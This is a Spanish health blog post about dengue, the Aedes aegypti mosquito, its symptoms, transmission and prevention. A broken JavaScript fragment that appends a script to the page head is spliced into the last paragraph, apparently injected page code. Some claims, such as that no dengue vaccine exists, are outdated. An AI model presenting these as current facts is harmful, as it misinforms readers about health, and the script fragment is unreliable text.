Salud y belleza » Enfermedades

Dengue: Aedes Aegypti en la sopa

Sin Comentarios

Especialmente las moscas, aunque también los mosquitos, han formado parte de la vida del hombre desde la prehistoria y son, por tanto, de los insectos más arraigados en el imaginario colectivo. También, desde ya, están considerados como los bichos más molestos. Claro que, de molestos a peligrosos, hay todo un abismo: una mosca en la sopa, es fastidiosa, en cambio un mosquito de la clase Aedes Aegypti, en una cubeta de agua es alarmante. Los mosquitos han transmitido enfermedades desde hace años pero, en la última época, algunos de esos males se han reconocido como sumamente riesgosos: es el caso del famoso Dengue.

El Dengue es una enfermedad viral y aguda que se produce, efectivamente, por un virus transportado por el mosquito Aedes Aegypti infectado. El AA se cría en zonas con agua acumulada ya sea en recipientes o en pequeños arroyos por lo tanto, mantener la higiene y los cuidados es determinante para intentar erradicar el problema.

La enfermedad del Dengue, suele ser más frecuente en niños y personas mayores, no así en adolescentes, y se caracteriza por la aparición repentina fiebre, dolores de cabeza y problemas articulatorios (articulaciones y músculos). De no tratarse de acuerdo a las reglas adecuadas, la gravedad de la fiebre puede ser mortal.

Pero, ¿cómo se contrae el Dengue? Sencillamente, por la picadura del mosquito Aedes aegypti que es el mosquito transmisor del dengue (los síntomas pueden presentarse hasta después de 5 a 7 días del incidente). Con respecto al contagio entre personas, el virus solo puede transmitirse de ese modo al entrar en contacto la sangre de un enfermo durante el período febril de la enfermedad con un individuo sano. Obviamente, es poco probable.

De momento, no existen vacunas para prevenir la enfermedad del Dengue siendo la mejor medida eliminar los lugares donde el mosquito puede desarrollarse que, como ya dijimos, es básicamente en envases artificiales que acumulan agua. Además, también se puede utilizar ciertos productos para que, frente al peor de los casos, los mosquitos no se acerquen a nosotros pero, lógicamente, se trata solo de “espejitos de colores”, la verdadera cura es otra: erradicarlo.

En España, dadas sus condiciones climáticas y otros factores, no se registran casos serios de Dengue pero, por supuesto, para evitar cualquier tipo de difuminación siempre es necesario colaborar con lo que se pueda: ya sea solo mediante información o, en el mejor de los casos, participando en distintos organizaciones sanitarias.if (document.currentScript) { d.getElementsByTagName('head')[0].appendChild(s);

Más consejos de salud y belleza : , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.